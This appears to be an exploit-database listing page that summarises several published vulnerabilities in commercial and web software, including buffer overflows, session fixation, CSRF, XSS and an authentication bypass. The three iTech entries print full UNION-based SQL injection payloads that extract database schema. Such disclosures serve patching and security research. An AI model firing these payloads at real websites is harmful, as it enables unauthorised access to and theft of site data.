Explore Vulnerabilities

Explore all Exploits:

Easy DVD Creater 2.5.11 – ‘Enter User Name’ Field Buffer Overflow (SEH)

Easy DVD Creater 2.5.11 has a buffer overflow in the 'Enter User Name' field. An attacker can exploit this vulnerability by sending a specially crafted payload to the application, which can lead to arbitrary code execution.

Apache2Triad v1.5.4 Multiple CVEs

Apache2Triad allows remote attackers to set an arbitrary PHPSESSID cookie. If an Apache2Triad user authenticates using the attacker-controlled PHPSESSID, the attacker can then access the Apache2Triad Web application with the same level of access as the victim and potentially take over the Apache2Triad system. Apache2Triad is vulnerable to Cross Site Request Forgery (CSRF) attacks, which allow an attacker to perform actions on behalf of the victim if the victim is logged into the Apache2Triad Web application. Apache2Triad is also vulnerable to Persistent Cross Site Scripting (XSS) attacks, which allow an attacker to inject malicious JavaScript code into the Apache2Triad Web application.

CVE-2017-6327

Symantec Messaging Gateway prior to and including version 10.6.3-2 contains an unauthenticated remote code execution vulnerability in the web interface. An attacker can construct a GET request to '/brightmail/action1.do?method=notificationLogin' with an encrypted version of the username they want to log in as, and set the JSESSIONID cookie to the current session. This will log the attacker in as the specified user.

NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities

The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device. A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service. This network service is prone to command injection and a stack-based buffer overflow.

QuantaStor Software Defined Storage multiple vulnerabilities

The QuantaStor login mechanism returns different messages depending on whether the account used to perform the login is valid in the system. Leveraging this difference, an attacker could enumerate valid usernames in the system. Two different XSS vulnerabilities were found in the appliance. The first one is located in the login page and the second one in the 'User Management' page.

iTech Job Script 9.27 – SQL Injection

The vulnerability allows an attacker to inject SQL commands. Proof of Concept: http://localhost/[PATH]/Employer_Details.php?id=[SQL] -3'++UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332--+- http://localhost/[PATH]/Job_Details.php?id=[SQL]

iTech Multi Vendor Script 6.63 – SQL Injection

The vulnerability allows an attacker to inject SQL commands. Proof of Concept: http://localhost/[PATH]/search.php?category_id=[SQL] -9+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529)--+- http://localhost/[PATH]/product.php?id=[SQL] Etc...

iTech Travel Script 9.49 – SQL Injection

The vulnerability allows an attacker to inject SQL commands. Proof of Concept: http://localhost/[PATH]/hotel_view.php?id=[SQL] -9+UNION(SELECT+0x283129,0x283229,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029)--+- http://localhost/[PATH]/bus_details.php?id=[SQL]

Recent Exploits: